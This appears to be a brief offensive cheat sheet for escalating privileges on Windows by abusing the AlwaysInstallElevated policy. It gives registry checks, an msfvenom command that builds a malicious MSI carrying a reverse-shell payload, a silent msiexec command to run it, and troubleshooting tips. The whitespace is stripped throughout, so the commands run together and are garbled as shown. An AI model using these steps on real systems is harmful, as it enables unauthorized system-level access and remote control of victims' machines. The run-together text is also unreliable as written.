# If the value for both is 1, then it's exploitableregqueryHKLM\Software\Policies\Microsoft\Windows\InstallerregqueryHKCU\Software\Policies\Microsoft\Windows\Installer# Generate a malicious .msi and transfer to victimmsfvenom-pwindows/shell_reverse_tcpLHOST=<IP>LPORT=<PORT>-fmsi-oevil.msi# Put the file in C:\Windows\Tempmsiexec/quiet/qn/iC:\Windows\Temp\evil.msi# or tryevil.msi# If doesn't work-> TryaDifferentportlike21-> TryDifferentArchlikex86andx64-> Tryputtingthefileintmportheuser's desktop